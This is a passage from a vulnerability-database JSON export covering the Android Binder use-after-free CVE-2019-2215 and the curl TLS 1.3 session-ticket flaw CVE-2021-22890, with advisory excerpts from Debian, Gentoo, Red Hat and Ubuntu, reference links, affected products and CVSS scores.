        "trust": 1.7,
        "url": "http://seclists.org/fulldisclosure/2019/oct/38"
      },
      {
        "trust": 1.7,
        "url": "http://packetstormsecurity.com/files/154911/android-binder-use-after-free.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00013.html"
      },
      {
        "trust": 1.7,
        "url": "http://packetstormsecurity.com/files/156495/android-binder-use-after-free.html"
      },
      {
        "trust": 1.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2215"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
      },
      {
        "trust": 1.1,
        "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20191030-01-binder-en"
      },
      {
        "trust": 1.1,
        "url": "https://seclists.org/bugtraq/2019/nov/11"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/155212/slackware-security-advisory-slackware-14.2-kernel-updates.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
      },
      {
        "trust": 1.0,
        "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2019-2215"
      },
      {
        "trust": 0.9,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-2215"
      },
      {
        "trust": 0.7,
        "url": "https://www.exploit-db.com/exploits/47463"
      },
      {
        "trust": 0.7,
        "url": "https://usn.ubuntu.com/4186-3/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4186-2/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/google-android-pixel-multiple-vulnerabilities-of-october-2019-30549"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0766/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/155309/ubuntu-security-notice-usn-4186-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4271/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0200/"
      },
      {
        "trust": 0.6,
        "url": "https://mp.weixin.qq.com/s/kjw0wkuh7gg6k5ago_6poq"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/48129"
      },
      {
        "trust": 0.6,
        "url": "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20191030-01-binder-cn"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/155335/ubuntu-security-notice-usn-4186-3.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/154730/android-binder-driver-use-after-free.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17053"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16746"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17054"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17055"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15098"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17056"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17052"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0154"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0155"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12207"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4186-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11135"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17666"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/416.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/kangtastic/cve-2019-2215"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/110334"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1062.69"
      },
      {
        "trust": 0.1,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/taa_mcepsc_i915"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-168.197"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1098.109"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14835"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17054"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17075"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15118"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17053"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10906"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10906"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-20976"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17052"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15117"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17133"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14816"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15505"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15098"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14821"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14835"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-16746"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15118"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10905"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10905"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14816"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3900"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15117"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17056"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14821"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10638"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17075"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3900"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10638"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17055"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20976"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14814"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17133"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15505"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14814"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.launchpad.net/bugs/1852141"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-169.198"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4186-3"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-2215"
      },
      {
        "db": "PACKETSTORM",
        "id": "155309"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "155335"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-198"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010672"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-2215"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2019-2215"
      },
      {
        "db": "PACKETSTORM",
        "id": "155309"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "155335"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-198"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010672"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-2215"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-11T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-2215"
      },
      {
        "date": "2019-11-13T17:16:22",
        "db": "PACKETSTORM",
        "id": "155309"
      },
      {
        "date": "2019-11-08T15:37:19",
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "date": "2019-11-14T15:56:10",
        "db": "PACKETSTORM",
        "id": "155335"
      },
      {
        "date": "2019-10-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201910-198"
      },
      {
        "date": "2019-10-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-010672"
      },
      {
        "date": "2019-10-11T19:15:10.947000",
        "db": "NVD",
        "id": "CVE-2019-2215"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-2215"
      },
      {
        "date": "2020-04-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201910-198"
      },
      {
        "date": "2019-10-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-010672"
      },
      {
        "date": "2025-10-24T14:11:31.703000",
        "db": "NVD",
        "id": "CVE-2019-2215"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "155309"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-198"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Android Uses freed memory vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010672"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-198"
      }
    ],
    "trust": 0.6
  }
}

VAR-202104-0328

Vulnerability from variot - Updated: 2025-06-09 19:56

curl 7.63.0 to and including 7.75.0 includes vulnerability that allows a malicious HTTPS proxy to MITM a connection due to bad handling of TLS 1.3 session tickets. When using a HTTPS proxy and TLS 1.3, libcurl can confuse session tickets arriving from the HTTPS proxy but work as if they arrived from the remote server and then wrongly "short-cut" the host handshake. When confusing the tickets, a HTTPS proxy can trick libcurl to use the wrong session ticket resume for the host and thereby circumvent the server TLS certificate check and make a MITM attack to be possible to perform unnoticed. Note that such a malicious HTTPS proxy needs to provide a certificate that curl will accept for the MITMed server for an attack to work - unless curl has been told to ignore the server certificate check. curl Contains a spoofing authentication evasion vulnerability.Information may be tampered with. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

Debian Security Advisory DSA-4881-1 security@debian.org https://www.debian.org/security/ Alessandro Ghedini March 30, 2021 https://www.debian.org/security/faq

Package : curl CVE ID : CVE-2020-8169 CVE-2020-8177 CVE-2020-8231 CVE-2020-8284 CVE-2020-8285 CVE-2020-8286 CVE-2021-22876 CVE-2021-22890 Debian Bug : 965280 965281 968831 977161 977162 977163

Multiple vulnerabilities were discovered in cURL, an URL transfer library:

CVE-2020-8169

Marek Szlagor reported that libcurl could be tricked into prepending
a part of the password to the host name before it resolves it,
potentially leaking the partial password over the network and to the
DNS server(s).

CVE-2020-8177

sn reported that curl could be tricked by a malicious server into
overwriting a local file when using th -J (--remote-header-name) and
-i (--include) options in the same command line.

CVE-2020-8231

Marc Aldorasi reported that libcurl might use the wrong connection
when an application using libcurl's multi API sets the option
CURLOPT_CONNECT_ONLY, which could lead to information leaks.

CVE-2020-8284

Varnavas Papaioannou reported that a malicious server could use the
PASV response to trick curl into connecting back to an arbitrary IP
address and port, potentially making curl extract information about
services that are otherwise private and not disclosed.

CVE-2020-8285

xnynx reported that libcurl could run out of stack space when using
tha FTP wildcard matching functionality (CURLOPT_CHUNK_BGN_FUNCTION).

CVE-2020-8286

It was reported that libcurl didn't verify that an OCSP response
actually matches the certificate it is intended to.

CVE-2021-22876

Viktor Szakats reported that libcurl does not strip off user
credentials from the URL when automatically populating the Referer
HTTP request header field in outgoing HTTP requests.

For the stable distribution (buster), these problems have been fixed in version 7.64.0-4+deb10u2.

We recommend that you upgrade your curl packages.

For the detailed security status of curl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/curl

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

                                        https://security.gentoo.org/

Severity: High Title: cURL: Multiple vulnerabilities Date: May 26, 2021 Bugs: #779535, #792192 ID: 202105-36

Synopsis

Multiple vulnerabilities have been found in cURL, the worst of which could result in the arbitrary execution of code.

Background

A command line tool and library for transferring data with URLs.

Affected packages

 -------------------------------------------------------------------
  Package              /     Vulnerable     /            Unaffected
 -------------------------------------------------------------------

1 net-misc/curl < 7.77.0 >= 7.77.0

Description

Multiple vulnerabilities have been discovered in cURL. Please review the CVE identifiers referenced below for details.

Impact

Please review the referenced CVE identifiers for details.

Workaround

There is no known workaround at this time.

Resolution

All cURL users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/curl-7.77.0"

References

[ 1 ] CVE-2021-22876 https://nvd.nist.gov/vuln/detail/CVE-2021-22876 [ 2 ] CVE-2021-22890 https://nvd.nist.gov/vuln/detail/CVE-2021-22890 [ 3 ] CVE-2021-22898 https://nvd.nist.gov/vuln/detail/CVE-2021-22898 [ 4 ] CVE-2021-22901 https://nvd.nist.gov/vuln/detail/CVE-2021-22901

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/202105-36

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Summary:

Red Hat JBoss Core Services Pack Apache Server 2.4.37 Service Pack 8 zip release for RHEL 7, RHEL 8 and Microsoft Windows is available.

Description:

This release adds the new Apache HTTP Server 2.4.37 Service Pack 8 packages that are part of the JBoss Core Services offering.

Security Fix(es):

curl: Use-after-free in TLS session handling when using OpenSSL TLS backend (CVE-2021-22901)
httpd: NULL pointer dereference on specially crafted HTTP/2 request (CVE-2021-31618)
libcurl: partial password leak over DNS on HTTP redirect (CVE-2020-8169)
curl: FTP PASV command response can cause curl to connect to arbitrary host (CVE-2020-8284)
curl: Malicious FTP server can trigger stack overflow when CURLOPT_CHUNK_BGN_FUNCTION is used (CVE-2020-8285)
curl: Inferior OCSP verification (CVE-2020-8286)
curl: Leak of authentication credentials in URL via automatic Referer (CVE-2021-22876)
curl: TLS 1.3 session ticket mix-up with HTTPS proxy host (CVE-2021-22890)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.

The References section of this erratum contains a download link for the update. You must be logged in to download the update.

Bugs fixed (https://bugzilla.redhat.com/):

References:

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

========================================================================== Ubuntu Security Notice USN-4898-1 March 31, 2021

curl vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS

Summary:

curl could be made to expose sensitive information over the network. A remote attacker could possibly use this issue to obtain sensitive information. A remote attacker in control of an HTTPS proxy could use this issue to bypass certificate checks and intercept communications. This issue only affected Ubuntu 20.04 LTS and Ubuntu 20.10. (CVE-2021-22890)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 20.10: curl 7.68.0-1ubuntu4.3 libcurl3-gnutls 7.68.0-1ubuntu4.3 libcurl3-nss 7.68.0-1ubuntu4.3 libcurl4 7.68.0-1ubuntu4.3

Ubuntu 20.04 LTS: curl 7.68.0-1ubuntu2.5 libcurl3-gnutls 7.68.0-1ubuntu2.5 libcurl3-nss 7.68.0-1ubuntu2.5 libcurl4 7.68.0-1ubuntu2.5

Ubuntu 18.04 LTS: curl 7.58.0-2ubuntu3.13 libcurl3-gnutls 7.58.0-2ubuntu3.13 libcurl3-nss 7.58.0-2ubuntu3.13 libcurl4 7.58.0-2ubuntu3.13

Ubuntu 16.04 LTS: curl 7.47.0-1ubuntu2.19 libcurl3 7.47.0-1ubuntu2.19 libcurl3-gnutls 7.47.0-1ubuntu2.19 libcurl3-nss 7.47.0-1ubuntu2.19

In general, a standard system update will make all the necessary changes

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.1.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.0"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "_id": null,
        "model": "communications billing and revenue management",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.0.0.3.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.12"
      },
      {
        "_id": null,
        "model": "sinec infrastructure network services",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.0.1.1"
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.6"
      },
      {
        "_id": null,
        "model": "hci storage node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "libcurl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.63.0"
      },
      {
        "_id": null,
        "model": "fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "_id": null,
        "model": "essbase",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "21.2"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "libcurl",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.75.0"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "34"
      },
      {
        "_id": null,
        "model": "jp1/automatic job management system 3",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": "- agent"
      },
      {
        "_id": null,
        "model": "fabric operating system",
        "scope": null,
        "trust": 0.8,
        "vendor": "broadcom",
        "version": null
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      },
      {
        "_id": null,
        "model": "jp1/automatic job management system 3",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": "- agent minimal edition"
      },
      {
        "_id": null,
        "model": "jp1/automatic job management system 3",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": "- manager"
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "libcurl",
        "scope": null,
        "trust": 0.8,
        "vendor": "haxx",
        "version": null
      },
      {
        "_id": null,
        "model": "gnu/linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "debian",
        "version": null
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "hci storage node",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002808"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22890"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162037"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1709"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2021-22890",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2021-22890",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.9,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 3.7,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.2,
            "id": "CVE-2021-22890",
            "impactScore": 1.4,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.8,
            "id": "CVE-2021-22890",
            "impactScore": 1.4,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 3.7,
            "baseSeverity": "Low",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2021-22890",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2021-22890",
            "trust": 1.0,
            "value": "LOW"
          },
          {
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "id": "CVE-2021-22890",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2021-22890",
            "trust": 0.8,
            "value": "Low"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202103-1709",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-22890",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-22890"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002808"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1709"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22890"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22890"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "curl 7.63.0 to and including 7.75.0 includes vulnerability that allows a malicious HTTPS proxy to MITM a connection due to bad handling of TLS 1.3 session tickets. When using a HTTPS proxy and TLS 1.3, libcurl can confuse session tickets arriving from the HTTPS proxy but work as if they arrived from the remote server and then wrongly \"short-cut\" the host handshake. When confusing the tickets, a HTTPS proxy can trick libcurl to use the wrong session ticket resume for the host and thereby circumvent the server TLS certificate check and make a MITM attack to be possible to perform unnoticed. Note that such a malicious HTTPS proxy needs to provide a certificate that curl will accept for the MITMed server for an attack to work - unless curl has been told to ignore the server certificate check. curl Contains a spoofing authentication evasion vulnerability.Information may be tampered with. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4881-1                   security@debian.org\nhttps://www.debian.org/security/                       Alessandro Ghedini\nMarch 30, 2021                        https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : curl\nCVE ID         : CVE-2020-8169 CVE-2020-8177 CVE-2020-8231 CVE-2020-8284 \n                 CVE-2020-8285 CVE-2020-8286 CVE-2021-22876 CVE-2021-22890\nDebian Bug     : 965280 965281 968831 977161 977162 977163\n\nMultiple vulnerabilities were discovered in cURL, an URL transfer library:\n\nCVE-2020-8169\n\n    Marek Szlagor reported that libcurl could be tricked into prepending\n    a part of the password to the host name before it resolves it,\n    potentially leaking the partial password over the network and to the\n    DNS server(s). \n\nCVE-2020-8177\n\n    sn reported that curl could be tricked by a malicious server into\n    overwriting a local file when using th -J (--remote-header-name) and\n    -i (--include) options in the same command line. \n\nCVE-2020-8231\n\n    Marc Aldorasi reported that libcurl might use the wrong connection\n    when an application using libcurl\u0027s multi API sets the option\n    CURLOPT_CONNECT_ONLY, which could lead to information leaks. \n\nCVE-2020-8284\n\n    